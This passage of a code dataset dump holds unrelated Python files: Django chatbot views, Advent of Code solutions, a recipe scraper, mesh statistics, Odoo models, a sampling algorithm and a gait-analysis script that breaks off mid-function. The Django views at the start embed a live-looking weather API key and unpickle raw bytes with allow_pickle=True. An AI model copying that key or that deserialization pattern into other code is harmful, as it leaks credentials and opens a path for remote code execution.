el[\"ground_truth\"]\n Memory.objects.filter(ground_truth=key_word)\n count = Memory.objects.filter(ground_truth=key_word).count()\n all_memories_list.append({\"ground_truth\":key_word,\n \"count\":count\n })\n return render(request,'record_audio.html',{\"Person\":\"Gustav\",\"all_memories_list\":all_memories_list})\n\n\ndef get_weather(request):\n url = 'http://api.openweathermap.org/data/2.5/weather?q=Eberstadt,ger&units=metric&lang=de&APPID=b3b25ed86b9fb6cfaac03f9b37164eef'\n req = urllib.request.urlopen(url)\n req_con = req.read().decode('utf-8')\n req_json = json.loads(req_con)\n return JsonResponse(req_json)\n\n\ndef chatbot_answer(request,name_person_global,person_statement):\n '#1.Step: The the question'\n print(\"ehllo\")\n chatbot_response = chatbot.get_response(person_statement)\n '#2.Step: Save conversation for training'\n task = threading.Thread(target=save_to_db, args=(name_person_global,person_statement,chatbot_response))\n '#2.1.Step: Define task as deamon so that the main program can exit and the saving to db is in other thread'\n task.daemon = True\n task.start()\n\n return JsonResponse({\"chatbot_response\":str(chatbot_response)})\n\n\ndef train_chatbot(request,optional_answer_chatbot,person_statement):\n\n trainer = ListTrainer(chatbot)\n trainer.train([person_statement,optional_answer_chatbot])\n return JsonResponse({\"successful_trained\": f\"person_statement: {person_statement},\"+\n f\"optional_answer_chatbot:{optional_answer_chatbot}\"})\n\n# Get example audio file\ndef get_mfcc_feature_data(data):\n \"\"\"\n Converts a wave file into his mfcc features\n @args:\n data_path(str):\n @return:\n mfcc_features(np.array)\n \"\"\"\n fs = 44100\n x = librosa.util.fix_length(data, 45000)\n mfcc_features = librosa.feature.mfcc(y=x, sr=fs)\n\n return mfcc_features\n\n\ndef save_to_db(name_person_global,person_statement,chatbot_response):\n \"\"\"\n functions save a dataset to the database\n @args:\n - name_person_global (str): e.g. \"gustav\"\n - person_statement(str): e.g. \"Wie heißt du?\"\n - chatbot_response (str): ich heiße Felix\n\n \"\"\"\n rc = Raw_Conversation(person_name=name_person_global,person_statement=person_statement,\n chatbot_response=chatbot_response)\n rc.save()\n\n\ndef bytes_numpy(bytes_raw):\n load_bytes = BytesIO(bytes_raw)\n loaded_np = np.load(load_bytes, allow_pickle=True)\n return loaded_np","repo_name":"gwillig/octocat","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3704822537","text":"TREE = \"#\"\nPATH = \".\"\n\n\ndef load_file(filename):\n for row in open(filename, \"r\"):\n yield row\n\n\ndef load_puzzle_into_list():\n grid = []\n for idx, line in enumerate(load_file(\"./input.txt\")):\n grid.append([char for char in line if char != \"\\n\"])\n\n return grid\n\n\ndef traverse_puzzle(puzzle, *params):\n right_step = params[0]\n down_step = params[1]\n\n cur_row = cur_col = new_col = hit_tree = 0\n\n while cur_row < len(puzzle) - 1:\n # print(puzzle[cur_row][cur_col])\n row_length = len(puzzle[cur_row + 1]) # 31\n\n try:\n new_col += right_step\n if new_col >= row_length:\n new_col = new_col - row_length\n\n if puzzle[cur_row + down_step][new_col] == TREE:\n hit_tree += 1\n\n except IndexError as e:\n print(new_col)\n\n cur_row += down_step\n cur_col = new_col\n\n return hit_tree\n\n\ndef solve():\n puzzle = load_puzzle_into_list()\n\n slopes = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]\n product = 1\n for slope in slopes:\n product *= traverse_puzzle(puzzle, *slope)\n print(product)\n\n\nsolve()\n","repo_name":"13scoobie/advent-of-code","sub_path":"2020/day3/problem_3_part_2.py","file_name":"problem_3_part_2.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38312735188","text":"from url_database import url_list as urls\nfrom fractions import Fraction\nfrom bs4 import BeautifulSoup\nimport unicodedata\nimport requests\nimport re\n\nmeasurements = ([' ml ',' mL ',' milliliter ',' milliliters ',' millilitre ',' millilitres ',\n' cc ',' l ',' L ',' liter ',' liters ',' litre ',' litres ',' teaspoon ',' teaspoons ',\n' tablespoon ',' tablespoons ',' T ',' tbl ',' tbs ',' tbsp ',' fluid ounce ',' fluid ounces ',\n' fl oz ',' gill ',' gills ',' cup ',' cups ',' c ',' pint ',' pints ',' p ',' pt ',' pts ',\n' fl pt ',' fl pts ',' quart ',' quarts ',' q ',' qt ',' fl qt ',' fl qts ',' gallon ',\n' gallons ',' g ',' gal ',' gals ',' mg ',' milligram ',' milligrams ',' milligramme ',\n' milligrammes ',' g ',' gs ',' gram ',' grams ',' gramme ',' grammes ',' kg ',' kgs ',\n' kilogram ',' kilograms ',' kilogramme ',' kilogrammes ',' pound ',' pounds ',' lb ',' lbs ',\n' # ',' ounce ',' ounces ',' oz ', ' stick ', ' sticks '])\nnumdict = {\n \"One\" : 1,\n \"Two\" : 2,\n \"Three\" : 3,\n \"Four\" : 4,\n \"Five\" : 5,\n \"Six\" : 6,\n \"Seven\" : 7,\n \"Eight\" : 8,\n \"Nine\" : 9,\n \"Ten\" : 10,\n}\n\ndef scraper(url):\n # Request HTML for URL then parse it\n result = requests.get(url)\n soup = BeautifulSoup(result.text, \"html.parser\")\n\n # Look for Food Network's recipe name by looking for meta element that contains the following condition\n scraped_recipe_name = soup.find(\"meta\", {\"property\" : \"og:title\"})\n # Item content contains name\n recipe_name = scraped_recipe_name[\"content\"]\n recipe_name = recipe_name.replace(\"'\",\"\")\n\n # Look for Food Network's ingredients checklist by looking for input elements that contain the following conditions \n shopping_list = soup.find_all(\"input\", {\"class\" : \"o-Ingredients__a-Ingredient--Checkbox\"}, {\"type\" : \"checkbox\"})\n # Item \"value\" contains ingredient + quantity\n scraped_ingred_quant = [item[\"value\"] for item in shopping_list[1:]]\n\n return recipe_name, scraped_ingred_quant\n\ndef cleanup(scraped_ingred_quant):\n ingredient_list = []\n list = []\n for item in scraped_ingred_quant:\n try:\n # Cleanup HTML encoding '\\xa0'\n item = unicodedata.normalize('NFKD', item)\n # 'One' -> '1', 'Two' -> '2', 'Three' -> '3'\n for key, value in numdict.items():\n if key in item:\n item = item.replace(key, str(value))\n # If string contains a digit\n if any(char.isdigit() for char in item):\n # and if string contains a unit of measurement\n if any(unit in item for unit in measurements):\n # then split accordingly\n x_unit = ''\n for unit in measurements:\n if unit in item and item.index(unit) <= 7:\n if '-' in item and item.index('-') < item.index(unit):\n list = number_no_unit(item, list)\n # If multiple units exist in one string, iterate with earlier unit\n # e.g. '5 tablespoons plus 3 ounces melted butter' <- Why do people do this?\n # Keep iterating until earliest unit is found\n elif item.index(unit) < item.index(x_unit) or item.index(x_unit) == 0:\n x_unit = unit\n list = item.split(x_unit, 1)\n try:\n # If ' ' exists, that means quantity is separated and requires addition\n # e.g. 1 1/2 cups, 2 2/5 teaspoons\n if ' ' in list[0]:\n num_list = list[0].split(' ', 1)\n total = sum(round(float(Fraction(x)), 2) for x in num_list)\n list[0] = str(total)\n # Convert any fractions to floats\n elif '/' in list[0]:\n list[0] = str(round(float(Fraction(list[0])), 2))\n list.insert(1, x_unit)\n except ValueError:\n # ValueError occurs if multiple units exist in one string and algorithm iterates the later one\n # Not sure how else to work around this\n continue\n elif unit in item and item.index(unit) > 7:\n list = number_no_unit(item, list)\n else:\n list = number_no_unit(item, list)\n else:\n list = ['', '', item]\n # Remove leading/trailing whitespace and quotes in string\n list = [s.strip() for s in list]\n list = [s.replace(\"'\",\"\") for s in list]\n ingredient_list.append(list)\n except:\n # If error (ValueError specifically), continue\n continue\n return ingredient_list\n\ndef number_no_unit(item, list):\n # Search for the first digit in the item\n num = (re.search(r'\\d+', item).group())\n # If '/' exists, e.g. 1/2 onion\n # Combine x/y to get fraction, assumes no fraction of x/yy\n if '/' in item and item.index('/') <= 4:\n if '(' in item and item.index(num) < item.index('('):\n num = (re.search(r'\\d+', item).group())\n else:\n num = item[item.index(num):item.index('/') + 2]\n if ' ' in num and item.index(' ') < item.index('/'):\n num_list = num.split(' ', 1)\n total = sum(round(float(Fraction(x)), 2) for x in num_list)\n num = str(total)\n if '-' in num and item.index('-') < item.index('/'):\n num_list = num.split('-', 1)\n total = sum(round(float(Fraction(x)), 2) for x in num_list)\n num = str(total)\n # and split accordingly\n list = item.split(num, 1)\n list[0] = str(round(float(Fraction(num)), 2))\n list.insert(1, '')\n\n return list\n\ndef url_cycler(urls):\n # Cycle through URls and create a list of tuples\n # Each tuple contains (recipe name, [list of ingredients]) \n for url in urls:\n recipe_name = scraper(url)[0]\n raw_ingred_quant = scraper(url)[1]\n \n ingredient_list = cleanup(raw_ingred_quant)\n yield recipe_name, ingredient_list\n\nname_and_ingredients = url_cycler(urls)\n# Convert generator to list\nname_and_ingredients = list(name_and_ingredients)\n\n# Remove any duplicates using dict by making keys out of recipe names since keys are unique\nunique_name_and_ingredients = []\nfor name in dict(name_and_ingredients).keys():\n # 'next' function to iterate through all duplicate ingredient lists until last one\n unique_name_and_ingredients += [(name, next(y for x, y in name_and_ingredients if x == name))]\n\nif __name__ == \"__main__\":\n print(unique_name_and_ingredients)\n","repo_name":"AvramEnriquez/Food-Network_Recipe-Ingredients-Database","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19759458172","text":"# set the path to find the current installation of pyMOAB\nimport sys\nimport numpy as np\nsys.path.append(\n '/opt/tljh/user/lib/moab/lib/python3.6/site-packages/pymoab-5.1.0-py3.6-linux-x86_64.egg')\nfrom pymoab.rng import Range\nfrom pymoab import core, types\n\n\ndef get_dagmc_tags(my_core):\n \"\"\"\n Get a dictionary with the important tags for DAGMC geometries\n \n inputs\n ------\n my_core : a MOAB Core instance\n \n outputs\n -------\n dagmc_tags : a dictionary of relevant tags\n \"\"\"\n\n dagmc_tags = {}\n\n dagmc_tags['geom_dim'] = my_core.tag_get_handle('GEOM_DIMENSION', size=1, tag_type=types.MB_TYPE_INTEGER, \n storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # geometric dimension\n\n dagmc_tags['category'] = my_core.tag_get_handle('CATEGORY', size=32, tag_type=types.MB_TYPE_OPAQUE, \n storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # the category\n\n dagmc_tags['global_id'] = my_core.tag_get_handle('GLOBAL_ID', size=1, tag_type=types.MB_TYPE_INTEGER, \n\n storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # id\n\n return dagmc_tags\n\n\ndef get_native_ranges(my_core, meshset, entity_types):\n \"\"\"\n Get a dictionary with MOAB ranges for each of the requested entity types\n \n inputs\n ------\n my_core : a MOAB Core instance\n meshset : a MOAB meshset to query for the ranges of entities\n entity_types : a list of valid pyMOAB types to be retrieved\n \n outputs\n -------\n native_ranges : a dictionary with one entry for each entity type that is a\n Range of handles to that type\n \"\"\"\n\n native_ranges = {}\n for entity_type in entity_types:\n native_ranges[entity_type] = my_core.get_entities_by_type(\n meshset, entity_type)\n return native_ranges\n\n\ndef get_entityset_ranges(my_core, meshset, geom_dim):\n \"\"\"\n Get a dictionary with MOAB Ranges that are specific to the types.MBENTITYSET\n type\n \n inputs\n ------\n my_core : a MOAB Core instance\n meshset : the root meshset for the file\n geom_dim : the tag that specifically denotes the dimesion of the entity\n \n outputs\n -------\n entityset_ranges : a dictionary with one entry for each entityset type, \n and the value is the range of entities that corrospond to each\n type\n \"\"\"\n \n entityset_ranges = {}\n entityset_types = ['Nodes', 'Curves', 'Surfaces', 'Volumes']\n for dimension, set_type in enumerate(entityset_types):\n entityset_ranges[set_type] = my_core.get_entities_by_type_and_tag(meshset, types.MBENTITYSET, geom_dim,\n [dimension])\n return entityset_ranges\n\n\ndef get_triangles_per_vertex(my_core, native_ranges):\n \"\"\"\n This function will return data about the number of triangles on each\n vertex in a file\n \n inputs\n ------\n my_core : a MOAB Core instance\n native_ranges : a dictionary containing ranges for each native type in the file (VERTEX, TRIANGLE, ENTITYSET)\n \n outputs\n -------\n t_p_v_data : a list of the number of triangles each vertex touches\n \"\"\"\n \n t_p_v_data = []\n tri_dimension = 2\n for vertex in native_ranges[types.MBVERTEX]:\n t_p_v_data.append(my_core.get_adjacencies(vertex, tri_dimension).size())\n return np.array(t_p_v_data)\n \n \ndef get_triangles_per_surface(my_core, entity_ranges):\n \"\"\"\n This function will return data about the number of triangles on each\n surface in a file\n \n inputs\n ------\n my_core : a MOAB Core instance\n entity_ranges : a dictionary containing ranges for each type in the file \n (VOLUME, SURFACE, CURVE, VERTEX, TRIANGLE, ENTITYSET)\n \n outputs\n -------\n t_p_s : a dictionary containing the entityhandle of the surface,\n and the number of triangles each surface contains.\n i.e {surface entityhandle : triangles it contains}\n \"\"\"\n\n t_p_s = {}\n for surface in entity_ranges['Surfaces']:\n t_p_s[surface] = my_core.get_entities_by_type(\n surface, types.MBTRI).size()\n return t_p_s\n\n \ndef get_surfaces_per_volume(my_core, entityset_ranges):\n \"\"\"\n Get the number of surfaces that each volume in a given file contains\n \n inputs\n ------\n my_core : a MOAB core instance\n entity_ranges : a dictionary of the entityset ranges of each tag in a file\n \n outputs\n -------\n s_p_v : a dictionary containing the volume entityhandle\n and the number of surfaces each volume in the file contains\n i.e. {volume entityhandle:surfaces it contains}\n \"\"\"\n\n s_p_v = {}\n for volumeset in entityset_ranges['Volumes']:\n s_p_v[volumeset] = my_core.get_child_meshsets(volumeset).size()\n return s_p_v\n\n\ndef get_triangle_aspect_ratio(my_core, meshset, geom_dim):\n\n \"\"\"\n Gets the triangle aspect ratio (according to the equation: (abc)/(8(s-a)(s-b)(s-c)), where s = .5(a+b+c).)\n \n inputs\n ------\n my_core : a MOAB Core instance\n meshset : a meshset containing a certain part of the mesh\n geom_dim : a MOAB Tag that holds the dimension of an entity.\n \n outputs\n -------\n t_a_r : (list) the triangle aspect ratios for all triangles in the meshset\n \"\"\"\n\n if my_core.tag_get_data(geom_dim, meshset)[0][0] == 3:\n entities = my_core.create_meshset()\n for surface in my_core.get_child_meshsets(meshset):\n my_core.add_entities(entities, my_core.get_entities_by_type(surface, types.MBTRI))\n tris = my_core.get_entities_by_type(entities, types.MBTRI)\n else:\n tris = my_core.get_entities_by_type(meshset, types.MBTRI)\n\n t_a_r = []\n\n for triangle in tris:\n side_lengths = []\n s = 0\n coord_list = []\n\n verts = list(my_core.get_adjacencies(triangle, 0))\n\n for vert in verts:\n coords = my_core.get_coords(vert)\n coord_list.append(coords)\n\n for side in range(3): \n side_lengths.append(np.linalg.norm(coord_list[side]-coord_list[side-2]))\n # The indices of coord_list includes the \"-2\" because this way each side will be matched up with both\n # other sides of the triangle (IDs: (Side 0, Side 1), (Side 1, Side 2), (Side 2, Side 0))\n \n s = .5*(sum(side_lengths))\n top = np.prod(side_lengths)\n bottom = 8*np.prod(s-side_lengths)\n t_a_r.append(top/bottom)\n\n return t_a_r\n","repo_name":"epickhardt/dagmc_stats","sub_path":"dagmc_stats.py","file_name":"dagmc_stats.py","file_ext":"py","file_size_in_byte":6692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"74680482712","text":"from odoo import api, models, fields\nfrom odoo.addons.promotion_program.models.promotion_program import OrderLine, Reward\n\n\nclass SaleOrder(models.Model):\n\n _inherit = 'sale.order'\n\n promotion_ids = fields.Many2many('promotion.program', \n 'order_promotion_rel', \n 'order_id', \n 'promotion_id', \n 'Promotions', \n compute='_compute_promotion_ids')\n\n @api.depends('date_order', 'team_id')\n def _compute_promotion_ids(self):\n for order in self:\n if order.team_id and order.date_order:\n date = fields.Datetime.context_timestamp(order, order.date_order).date()\n order.promotion_ids = self.env['promotion.program']._get_available_promotions(date=date, \n teams=order.team_id)\n else:\n order.promotion_ids = []\n\n def apply_promotion(self):\n action = {\n 'name': 'Select Promotion',\n 'type': 'ir.actions.act_window',\n 'res_model': 'get.sale.promotion',\n 'context': {\n 'default_date_order': self.date_order,\n 'default_partner_id': self.partner_id.id,\n 'default_order_id': self.id,\n 'default_currency_id': self.currency_id.id,\n 'default_company_id': self.company_id.id,\n },\n 'target': 'new',\n 'view_mode': 'form',\n }\n return action\n\n def remove_promotions(self):\n promotion_lines = self.order_line.filtered(lambda l: l.promotion_id)\n promotion_lines.unlink()\n\n\nclass SaleOrderLine(models.Model):\n\n _inherit = 'sale.order.line'\n\n promotion_id = fields.Many2one('promotion.program', 'Promotion')\n promotion_account_id = fields.Many2one('account.account', 'Promotion COA')\n\n def _prepare_invoice_line(self, **optional_values):\n values = super(SaleOrderLine, self)._prepare_invoice_line(**optional_values)\n if self.promotion_account_id and self.product_id:\n values['name'] = self.product_id.name_get()[0][1]\n values['promotion_id'] = self.promotion_id.id\n values['promotion_account_id'] = self.promotion_account_id.id\n return values\n","repo_name":"zawnainglinn1996/food","sub_path":"promotion_program/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42396453587","text":"\"\"\" 문자열 재정렬\n알파벳 대문자와 숫자 0~9로만 구성된 문자열이 입력으로 주어진다.\n모든 알파벳을 오름차순으로 정렬하여 이어서 출력, 그 뒤 모든 숫자를 더한값을 이어서 출력한다.\n요구하는 정답 출력 \"\"\"\ns = input()\nstring_result =[]\nint_result =[]\ncheck_integer = ['0','1','2','3','4','5','6','7','8','9']\nfor i in s:\n if i in check_integer:\n int_result.append(int(i))\n else:\n string_result.append(i) \nstring_result.sort()\nfor i in string_result:\n print(i,end='')\nprint(sum(int_result))\n","repo_name":"LEEILHO/Coding_Test","sub_path":"이것이코딩테스트다/quiz08.py","file_name":"quiz08.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21694974946","text":"# python gives a number of inbuilt function and standard libraries \n# to use the functions under the standard libraries we need to import the module\n\n# for Ex: randint() method is in random module\n\nimport random\n\nrandomNumber = random.randint(20,30)\nprint(randomNumber)\n\n# we can import multiple module in one \n\n# import random , sys , os , math \n\n# another way to import the module is : from random import *\n\nimport sys\n\nprint('statement before the exit statement')\n\nsys.exit()\n\nprint('statement after the exit statement')\n\nimport pyperclip\n\npyperclip.copy('hello world')\npyperclip.paste()","repo_name":"rosharma09/PythonBasics","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31601187777","text":"\"\"\"Bridson sampling\n\nReferences: Robert Bridson, Fast Poisson Disk Sampling in Arbitrary Dimensions , SIGGRAPH, 2007\n\nWritten by Sanghun Jee and Sungho Hong\nSupervised by Erik De Schutter\nComputational Neuroscience Unit,\nOkinawa Institute of Science and Technology\n\nMarch, 2020\n\"\"\"\n\nimport numpy as np\n\nfrom functools import partial\nfrom tqdm.autonotebook import tqdm\nfrom sklearn.neighbors import KDTree, NearestNeighbors\n\nfrom .utils import PointCloud\n\n\ndef make_2d_grid(sizeI, cellsize):\n return np.mgrid[0 : sizeI[0] : cellsize, 0 : sizeI[1] : cellsize]\n\n\ndef make_3d_grid(sizeI, cellsize):\n return np.mgrid[\n 0 : sizeI[0] : cellsize, 0 : sizeI[1] : cellsize, 0 : sizeI[2] : cellsize\n ]\n\n\ndef set_nDarts(nPts, n_pts_created, n_pts_newly_created, nEmptyGrid, dartFactor=4):\n n_to_create = nPts - n_pts_created\n # if n_pts_newly_created==0:\n #\n # else:\n # ndarts = n_pts_newly_created*2\n ndarts = np.min([nPts / dartFactor, nEmptyGrid / dartFactor])\n # ndarts = np.max([n_to_create, nPts / dartFactor])\n return int(np.round(ndarts))\n\n\ndef bridson_sampling(\n fgrid,\n sizeI,\n spacing,\n nPts,\n showIter,\n ftests=[],\n discount_factor=0.5,\n stopping_criterion=\"density\",\n):\n count = 0\n count_time = []\n elapsed_time = []\n\n # Setting properties of iterati\n ndim = len(sizeI)\n cellsize = spacing / np.sqrt(ndim)\n\n # Make grid size such that there is just one pt in each grid\n dgrid = spacing / np.sqrt(ndim)\n\n # Make a grid and convert it into a nxD array\n sGrid_nd = fgrid(sizeI, cellsize)\n\n sGrid = np.array([sGrid_nd[i][:].flatten() for i in range(ndim)]).T\n del sGrid_nd\n\n # Thrown in a particular grid\n nEmptyGrid = nEmptyGrid0 = sGrid.shape[0]\n scoreGrid = np.ones(sGrid.shape[0])\n\n # Initialize Parameters\n if nPts == 0:\n nPts = nEmptyGrid\n n_pts_created = 0\n n_pts_newly_created = 0\n pts = np.empty(shape=(1, ndim))\n iter = 0\n\n # Start Iterative process\n\n pcl = PointCloud(pts, spacing)\n nn2 = NearestNeighbors(radius=spacing)\n\n if ftests != []:\n print(\"Testing coverage of cells...\")\n is_cell_uncovered = np.ones(sGrid.shape[0], dtype=bool)\n for ftest in ftests:\n is_cell_uncovered = ftest.test_cells(sGrid, dgrid)\n\n sGrid = sGrid[is_cell_uncovered, :]\n scoreGrid = scoreGrid[is_cell_uncovered]\n nEmptyGrid = np.sum(sGrid.shape[0])\n print(\"Uncovered cells: {}%\\n\".format(nEmptyGrid / nEmptyGrid0 * 100))\n\n if showIter:\n pbar = tqdm(total=nPts)\n pbar_grid = tqdm(total=nEmptyGrid0)\n pbar_grid.update(nEmptyGrid0 - nEmptyGrid)\n\n if stopping_criterion != 'density':\n raise RuntimeError('Bridson sampling allows only the density-based stopping criterion')\n\n while n_pts_created < nPts and nEmptyGrid > 0:\n # Thrown darts in eligible grids\n # availGrid, = np.where(is_grid_empty)\n # score_availGrid = scoreGrid[availGrid]\n scoreGrid = scoreGrid / scoreGrid.sum()\n\n ndarts = set_nDarts(nPts, n_pts_created, n_pts_newly_created, nEmptyGrid)\n if ndarts != sGrid.shape[0]:\n p = np.random.choice(\n range(sGrid.shape[0]), ndarts, replace=False, p=scoreGrid\n )\n tempPts = sGrid[p, :] + dgrid * np.random.rand(len(p), ndim)\n else:\n tempPts = sGrid + dgrid * np.random.rand(len(ndarts), ndim)\n\n # withinI = np.array([tempPts[:, i] < sizeI[i] for i in range(ndim)]).T\n # withinI = np.array([np.prod(x) for x in withinI])\n # eligiblePts = (withinI>0)*(D>spacing)*(Dist > 10)\n\n is_safe_to_continue = 1\n\n if ftests != []:\n is_safe_with_prev_pts = np.ones(len(p), dtype=bool)\n for ftest in ftests:\n is_safe_with_prev_pts = is_safe_with_prev_pts * ftest.test_points(\n tempPts\n )\n\n is_safe_to_continue = np.sum(is_safe_with_prev_pts)\n rejected_grids = p[~is_safe_with_prev_pts]\n scoreGrid[rejected_grids] = scoreGrid[rejected_grids] * discount_factor\n\n p = p[is_safe_with_prev_pts]\n tempPts = tempPts[is_safe_with_prev_pts, :]\n\n if is_safe_to_continue > 0 and n_pts_created > 0:\n # check with previously generated points\n # is_safe_with_prev_pts = np.frompyfunc(lambda x: x.size == 0, 1, 1)(\n # nn1.radius_neighbors(tempPts, return_distance=False)\n # ).astype(bool)\n is_safe_with_prev_pts = pcl.test_points(tempPts)\n is_safe_to_continue = np.sum(is_safe_with_prev_pts)\n rejected_grids = p[~is_safe_with_prev_pts]\n scoreGrid[rejected_grids] = scoreGrid[rejected_grids] * discount_factor\n\n p = p[is_safe_with_prev_pts]\n tempPts = tempPts[is_safe_with_prev_pts, :]\n\n if is_safe_to_continue > 0:\n # find colliding pairs and leave only one of the pairs\n nn2.fit(tempPts)\n ind = nn2.radius_neighbors(tempPts, return_distance=False)\n\n # ind = KDTree(tempPts).query_radius(tempPts, r=spacing)\n is_eligible = np.frompyfunc(lambda i: (ind[i] < i).sum() == 0, 1, 1)(\n np.arange(ind.size)\n ).astype(bool)\n\n accepted_pts = tempPts[is_eligible, :]\n\n accepted_grids = p[is_eligible]\n rejected_grids = p[~is_eligible]\n remaining_grids = np.setdiff1d(range(sGrid.shape[0]), accepted_grids)\n\n sGrid = sGrid[remaining_grids, :]\n # scoreGrid[rejected_grids] = scoreGrid[rejected_grids] * discount_factor\n scoreGrid = scoreGrid[remaining_grids]\n\n n_pts_newly_created = accepted_pts.shape[0]\n if n_pts_newly_created > 0:\n # Update quantities for next iterations\n nEmptyGrid = sGrid.shape[0]\n if n_pts_created == 0:\n pcl.update_points(accepted_pts)\n else:\n pcl.append_points(accepted_pts)\n\n n_pts_created = pcl.points.shape[0]\n\n if showIter:\n pbar.update(n_pts_newly_created)\n pbar_grid.update(n_pts_newly_created)\n\n iter += 1\n\n pts = pcl.points\n if pts.shape[0] > nPts:\n p = np.arange(pts.shape[0])\n p = np.random.choice(p, nPts, replace=False)\n pts = pts[p, :]\n\n if showIter:\n pbar.close()\n pbar_grid.close()\n print(\n \"\\nIteration: {}, (final)Points Created: {}, is_grid_empty:{} ({}%)\".format(\n iter, pts.shape[0], nEmptyGrid, nEmptyGrid / nEmptyGrid0 * 100\n )\n )\n return pts\n\n\nBridson_sampling_2d = partial(bridson_sampling, make_2d_grid)\n\nBridson_sampling_3d = partial(bridson_sampling, make_3d_grid)\n","repo_name":"CNS-OIST/pycabnn","sub_path":"pycabnn/pop_generation/bridson.py","file_name":"bridson.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"33784897503","text":"class Solution:\n def beautifulPartitions(self, s: str, k: int, minLength: int) -> int:\n n = len(s)\n mod = 10**9 + 7\n primes = (\"2\", \"3\", \"5\", \"7\")\n \n if s[0] not in primes or s[-1] in primes: return 0\n \n can_break = [i>0 and s[i] in primes and s[i-1] not in primes for i in range(n)]\n \n dp_prev = [1] * (n)\n dp = [0] * n\n \n \n for p in range(1, k):\n if p == 2:\n for r in range(minLength):\n dp[r] = 0\n for r in range(minLength, n):\n if can_break[r]:\n dp[r] = (dp[r-1] + dp_prev[r-minLength])%mod\n else:\n dp[r] = dp[r-1]\n # print(dp)\n dp, dp_prev = dp_prev, dp \n \n return dp_prev[-minLength]","repo_name":"mdakram28/leetcode-archive","sub_path":"my-folder/problems/number_of_beautiful_partitions/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29279416406","text":"def main():\n '''\n A = Rock | B = Paper | C = Scissors\n X = Lose | Y = Draw | Z = Win\n '''\n score = 0\n with open('input2.txt') as game_input:\n for game in game_input:\n outcome = game_outcome[game.strip()]\n score += (outcome[\"wl\"] + outcome[\"ps\"])\n\n print(f'total: {score}')\n\n\ngame_outcome = {\n 'A X': { 'wl': 0, 'ps': 3,},\n 'A Y': { 'wl': 3, 'ps': 1,},\n 'A Z': { 'wl': 6, 'ps': 2,},\n 'B X': { 'wl': 0, 'ps': 1,},\n 'B Y': { 'wl': 3, 'ps': 2,},\n 'B Z': { 'wl': 6, 'ps': 3,},\n 'C X': { 'wl': 0, 'ps': 2,},\n 'C Y': { 'wl': 3, 'ps': 3,},\n 'C Z': { 'wl': 6, 'ps': 1,},\n}\n\nif __name__ == '__main__':\n main()","repo_name":"absenth/advent-of-code","sub_path":"2022-Advent_of_code/2022-12-02/challenge2b.py","file_name":"challenge2b.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13928264475","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 8 14:42:06 2020\n\n@author: Nick1\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport sys\nimport os\nfrom .getevents import read_events\nfrom termcolor import colored\n\ndef calcStateSpace(sig,events,fs,n_dim,delay):\n# =============================================================================\n# Calculate state space using n_dimension with time delay [delay] in samples\n# =============================================================================\n from scipy.interpolate import interp1d\n print(\"creating state space...\")\n # make sorted heel strike list\n lhs = np.array(events.l_heel_strike)*fs\n rhs = np.array(events.r_heel_strike)*fs\n meve = np.array([])\n arr_ieve = np.hstack((rhs,lhs))\n arr_neve = np.hstack((np.zeros(rhs.shape),np.ones(lhs.shape)))\n meve = np.vstack((arr_ieve,arr_neve))\n meve = meve[:,meve[0,:].argsort()]\n # get number of strides and samples\n n_samples = (meve.shape[1]-1)*100\n # new signal without trailinabs\n idx_truesamp = int(meve[0,0]-1)\n idx_tail = int(meve[0,-1]-1)\n #idx_cut = np.hstack((np.zeros(int(meve[0,0])),np.ones(n_truesamp),np.zeros(n_tail)))\n# sig_new = np.vstack((com.COMx,com.COMy,com.COMz))\n sig_new = sig[idx_truesamp:idx_tail]\n t_new = np.linspace(0,1,sig_new.shape[0])\n t_inter = np.linspace(0,1,n_samples)\n # sligthly different than Sjoerd's method (does not extrapolate data)\n fsig_int = interp1d(t_new,sig_new,kind = 'cubic')\n sig_int = fsig_int(t_inter)\n # create empty statespace array\n state = np.zeros([n_samples-(n_dim-1)*delay,n_dim])\n #create the state space now:\n for i_dim in range(n_dim):\n idx_start = (i_dim)*delay\n idx_stop = n_samples-(n_dim-i_dim-1)*delay\n state[:,i_dim] = sig_int[idx_start:idx_stop]\n return state\n\n\ndef calcLDE(state,ws,fs,period,nnbs):\n# =============================================================================\n# Calculate Local Differgence Exponent\n# =============================================================================\n win = np.round(ws*fs)\n [m,n] = state.shape\n state = np.vstack((state,np.zeros([int(win),int(n)])*np.nan))\n divmat = np.zeros([int(m*nnbs),int(win)])*np.nan\n difmat = np.zeros([int(m+win),int(n)])*np.nan\n L1 = .5*period*fs\n print('Calculating local divergence ...')\n sys.stdout.write(\"[%s]\" % (\".\" * 10))\n sys.stdout.flush()\n sys.stdout.write(\"\\b\" * (10+1))\n steps = 9\n for i_t in range(m):\n if np.greater_equal((i_t/m)*100,steps):\n 